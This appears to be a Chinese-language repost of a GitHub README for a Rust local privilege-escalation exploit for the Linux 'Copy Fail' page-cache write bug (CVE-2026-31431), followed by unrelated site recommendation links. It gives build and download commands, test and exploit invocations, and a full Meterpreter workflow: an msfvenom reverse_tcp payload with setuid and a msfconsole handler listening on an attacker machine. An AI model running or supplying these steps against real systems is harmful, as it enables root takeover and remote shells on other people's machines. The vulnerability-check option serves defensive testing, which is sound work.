CVE-2026-31431 - Linux Copy-Fail 漏洞利用 (Rust版本)和检测方案

CVE-2026-31431 - Linux Copy-Fail 漏洞利用 (Rust)

针对 CVE-2026-31431 (Copy-Fail) 漏洞的本地提权 (LPE) 漏洞利用的 Rust 实现。

它允许执行自定义的 shellcode(例如 Meterpreter)。

简介

Xint 披露了 CVE-2026-31431,这是一个任意页缓存写入(arbitrary page cache write)漏洞,它通过将 AF_ALGsplice() 链式结合,实现了一个 4 字节的写入原语(write primitive)。

来源:Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

免责声明

本项目的开发是出于我个人研究网络安全的兴趣。然而,它有可能会被滥用于恶意目的。

不要将此工具用于任何非法活动。

作者对滥用本软件所造成的任何后果概不负责。

致谢

注意:原始项目使用了经过压缩/编码的 shellcode(例如 /bin/sh)。在此实现中,我将其替换为了原始的(未压缩的) /bin/bash shellcode,使其更容易进行自定义,或直接替换为用户提供的 payload。

如何编译

克隆该项目,然后执行 build.sh

Bash

复制代码
git clone git@github.com:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

用法

下载并解压 release 压缩包:

Bash

复制代码
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

二进制文件提供以下选项:

Bash

复制代码
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

演示

测试漏洞

在存在漏洞的机器上执行:

Bash

复制代码
./CVE-2026-31431-Linux-Copy-Fail --test

出现 ! VULNERABLE! 说明目标机器存在该漏洞,(用此命令可以检测出目标机器是否存在漏洞)

漏洞利用

Bash

复制代码
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

使用以下命令(需将 PrependSetUid 设置为 True)来生成 Meterpreter payload:

Bash

复制代码
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

在攻击机(Kali Linux)上执行:

Bash

复制代码
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

在存在漏洞的机器上执行:

复制代码
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

致谢https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/提供的方案

受影响的版本

相关推荐
Sagittarius_A*20 分钟前
Docker:渗透前置容器化核心基础
运维·安全·docker·容器
网络小白不怕黑1 小时前
监控httpd状态
服务器
阿米亚波2 小时前
【EVE-NG 实战】防火墙基础(VLAN · VRRP · NAT · ACL · 静态路由)
运维·网络·笔记·网络协议·计算机网络·网络安全·运维开发
日取其半万世不竭2 小时前
云服务器迁移怎么少停机?DNS 切换前后的完整清单
运维·服务器
FREEDOM_X3 小时前
Linux 多线程编程——总结
java·linux·运维·ubuntu
名字还没想好☜3 小时前
Docker 多阶段构建:把镜像从 1.2GB 砍到 15MB
运维·docker·容器·多阶段构建·镜像优化
祸心依旧3 小时前
Visual Studio 五月更新 —— 计划、评审、优化
运维·人工智能·visual studio
Web4Browser3 小时前
Headless 浏览器自动化适合哪些任务?巡检、截图和提交动作要分级
运维·前端·自动化
難釋懷3 小时前
Nginx浏览器强制缓存
运维·nginx·缓存
大博士.J4 小时前
视频号主体违规与认证上限?正确的解决方式
运维·python·自动化